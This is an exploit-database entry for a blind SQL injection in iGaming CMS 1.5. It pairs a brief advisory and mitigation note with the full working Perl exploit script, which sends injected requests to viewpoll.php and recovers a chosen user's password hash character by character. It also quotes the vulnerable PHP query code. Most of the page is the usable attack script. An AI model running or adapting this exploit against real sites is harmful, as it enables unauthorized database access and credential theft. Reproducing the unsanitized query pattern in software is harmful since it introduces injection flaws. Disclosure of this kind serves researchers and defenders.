iGaming CMS - exploit.company

vendor:

iGaming CMS

by:

plucky

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: iGaming CMS

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE: N/A

CPE: a:igaming_cms:igaming_cms:1.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

iGaming CMS <= 1.5 Blind SQL Injection

iGaming CMS version 1.5 is vulnerable to Blind SQL Injection. This vulnerability allows an attacker to extract sensitive information from the database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'polls.class.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable script. This can allow the attacker to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL statements in an application. The application should use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

#!/usr/bin/env perl

=pod
iGaming CMS <= 1.5 Blind SQL Injection

Author: plucky
Email: io.plucky@gmail.com
Web Site: http://plucky.heliohost.org
Crew : WarWolfZ

Usage:   perl exploit.pl <website> <user_id>
Example: perl exploit.pl http://website.net/iGamingCMS1.5/ 1

Vulnerability: polls.class.php
[line 10-17]

if (!empty($_REQUEST['id']))
{
  $poll = $db->Execute("
                        SELECT id,title
                        FROM `sp_polls`
                        WHERE `id` = '" . $_REQUEST['id'] . "'");

$result = $db->Execute("SELECT * FROM sp_polls_options WHERE poll_id = '$_REQUEST[id]' ORDER BY id"); 

THX TO: shrod and warwolfz crew
=cut

use strict;
use warnings;
use LWP::Simple;

my $password               = '';
my $vulnerable_page        = '';

my $target_id              =  1;

sub header_exploit {
   
   print 'iGaming CMS <= 1.5 Blind SQL Injection'    . "\n".
         '-----------------------------------------' . "\n".
         'Author:  plucky'                           . "\n".
         'Email:   io.plucky@gmail.com'              . "\n".
         '-----------------------------------------' . "\n".
         '[!]Target id: '.$target_id                 . "\n".
         '[!]Exploit Status: Working...'             . "\n";
}

sub usage_exploit {

   print 'Usage:'                                                    . "\n".
         '      perl exploit.pl http://[site]/[path]/ [id]'          . "\n".
         'Examples:'                                                 . "\n".
         '         perl' . $0 . 'http://web_site/cms/ 1'             . "\n".
         '         perl' . $0 . 'http://games_site/iGamingCMS1.5/ 1' . "\n";

exit;
}

sub run_exploit {
   
   my $parameter_id           = shift;
   my $parameter_page         = shift;

   my $target_id              = $$parameter_id;
   my $vulnerable_page        = $$parameter_page;

   my $character_id           =  1;

   my $HTML_source            = '';
   my $SQL_Injection          = '';
   my $hexadecimal_character  = '';
   my $result                 = '';
   my $table                  = 'sp_members';

   my @hexadecimal_characters = ( 48..57, 97..102 );


   foreach $character_id ( 1..32 ) {
       
   character_research:
          foreach $hexadecimal_character ( @hexadecimal_characters ) {

                 $SQL_Injection  = "viewpoll.php?id=' or ascii(substring((select pass from $table where id=$target_id),$character_id,1))=$hexadecimal_character\%23"; 
                 $HTML_source = get( $vulnerable_page.$SQL_Injection );

                 if ( $HTML_source !~ /Error/i ) {

                   $result .= chr($hexadecimal_character);
                   $character_id++;

                   last character_research;
       }
     }
   }
   
   return $result;
}

$vulnerable_page = $ARGV[0] || usage_exploit;
$target_id       = $ARGV[1] || usage_exploit;

header_exploit;
$password = run_exploit ( \$target_id, \$vulnerable_page );

print '[!]Password: ', $password, "\n";